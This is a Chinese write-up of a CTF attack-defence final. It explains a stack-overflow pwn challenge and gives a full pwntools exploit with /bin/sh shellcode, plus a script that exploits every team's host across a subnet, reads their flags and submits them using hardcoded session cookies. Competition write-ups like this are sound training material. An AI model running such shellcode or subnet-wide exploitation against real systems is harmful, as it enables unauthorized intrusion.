第三届 广东省强网杯 线下决赛 pwn-AWD模式

第三届广东省强网杯的线下决赛，只有一道pwn题，而且是啥保护都没开的栈溢出，有pwn手的队伍都能秒patch，然后就是写好exp，十五分钟刷新一轮flag的时候跑一次打全场，全程咸鱼快睡着了都。。

题目分析

栈溢出，溢出8字节刚好能覆盖返回地址。程序中有给出栈地址，而且没开NX保护，所以我这里选择写shellcode到栈上然后覆盖返回地址为shellcode就行了。

leak stack

stack overflow

完整EXP

exploit

from pwn import *

#elf = ELF('./pwn')
#libc = elf.libc    #/lib/x86_64-linux-gnu/libc-2.23.so

context(arch = 'amd64', os = 'linux')

def exp(IP, PORT):
    p = remote(IP, PORT)
    #p = process('./pwn')
    p.sendlineafter('Enter your choice:\n', '3')
    payload1 = 'a'*0x28 + p64(0x12345678) + 'qqqq' + p64(0x400809)
    p.sendafter('What?', payload1)
    p.sendlineafter('Enter your choice:\n', '2')
    p.recvuntil('It is magic: [0x')
    stack = int(p.recvn(12), 16)
    #log.success(hex(stack))
    shellcode_addr = stack
    shellcode = ""
    #shellcode += asm('push 0')
    shellcode += asm('mov dword ptr [rsp], 0x6e69622f')
    shellcode += asm('mov dword ptr [rsp+4], 0x0068732f')
    
    shellcode += asm('mov rdi, rsp')
    shellcode += asm('xor rsi, rsi')
    shellcode += asm('xor rdx, rdx')
    shellcode += asm('xor rax, rax')
    shellcode += asm('mov rax, 59')
    shellcode += asm('syscall')
    payload2 = shellcode.ljust(0x38, '\0') + p64(shellcode_addr)
    #gdb.attach(p, 'b *0x400881\nb *0x400896')
    p.sendlineafter('Enter your choice:\n', '3')
    p.sendafter('What?', payload2)
    #print hex(len(shellcode))
    p.sendlineafter('Enter your choice:\n', 'a')
    return p
	
if __name__ == '__main__':
	p = exp('127.0.0.1', 9527)
	p.interactive()
	
	
#	2f	62	69	6e	2f	73	68/bin/sh
#//bin/sh

打全场的exploit

#!/usr/bin/env python2
# -*- coding: utf-8 -*- #
from pwn import *
import time
import os
import requests
from exploit import *

def submit_flag(flag, token):
    url = "http://100.100.100.10/checkAnswer"
    failed = '\u56de\u7b54\u9519\u8bef'
    resub = '\u91cd\u590d\u4f5c\u7b54'
    #failed = 'QAQ' 
    data = {
        "answer":flag,
        "token":token,
        "rule":2,
        "theme_id":1,
        "type":2
    }
    cookie = {
        "XSRF-TOKEN":"eyJpdiI6Ik5wUFkrbHI3NUJIRlFtK0RKaWhBblE9PSIsInZhbHVlIjoiMHR4WVJ4dk1hSUxxbkp0MFY2b2FZWFhtTkkzTEx5MDFSY3M0SE9FNjJSeTB1NzF2ZTFDNjBOSFdXNlRvempzWSIsIm1hYyI6Ijg2YjMzMTMxYWE2NDYxYTAzM2JmZjY0ZWY3MzA1ZDIxMGM1MGEzYTJhNmQ5M2RjNjVmMTc2YTYxNzEyNTcyNTIifQ%3D%3D",
        "laravel_session":"eyJpdiI6InMwWFEyaVk3a29PVlRla0JiQUpBN1E9PSIsInZhbHVlIjoiXC9PaG85MGFnSzUxRkdSdUh2cHdSYVljekJ4U1NkcGNBS25kQUNkcXJuWUhKREVicGV0VzBaRHlVSVk3YmRZXC9ZIiwibWFjIjoiZjNkNjQyYjRhM2MyYzg2NDY5ZWMxYjE5MzRjZDVhNTNlOTk5OWRjYzU5OWY4M2FhNDI4NTMzM2NkNTI1ZjI2MyJ9"
    
    }
    #print "[O.O] Submiting flag"
    response = requests.post(url,data=data ,cookies = cookie ,timeout=4)
    content = response.content
    #print "[+] Content : %s" % (content)
    if failed in content:
        print "[T.T] Submit failed!"
        return False
    elif resub in response.content:
        print "[ :)] Submit Chong Fu!"
        return False
    else:
        print "[^.^] Submit success!"
        return True

        
def get_shell(ip='', port=0):
    #exploit code
    p = exp(ip, port)
    return p

def attack(sleep_time=10):
    with open('./flag_list.txt', 'a+') as fd:
    # 打全场 AWD用
    #ip_list = ['172.16.20.4', '172.16.20.5','172.16.20.7', '172.16.20.9', '172.16.20.11']
   # while True:
        for IP1 in range(2,22):
            try:    
                p = get_shell(ip='172.16.%d.30'%IP1, port=10000)
                #p = get_shell(ip='127.0.0.1', port=PORT)
                p.sendline('cat flag')
                p.recvuntil('flag{', drop=True)
                flag = p.recvuntil('}', drop=True)
                print '[^.^] flag' + flag
                fd.write('flag{'+flag+'}\n')
                submit_flag(flag, token)
                p.close()
            except:
                print '[T.T] FUCK'
            print "-"*0x50+'\n'
            time.sleep(sleep_time)

def main():
    attack(sleep_time=1)

if __name__ == '__main__':
    main()

效果如下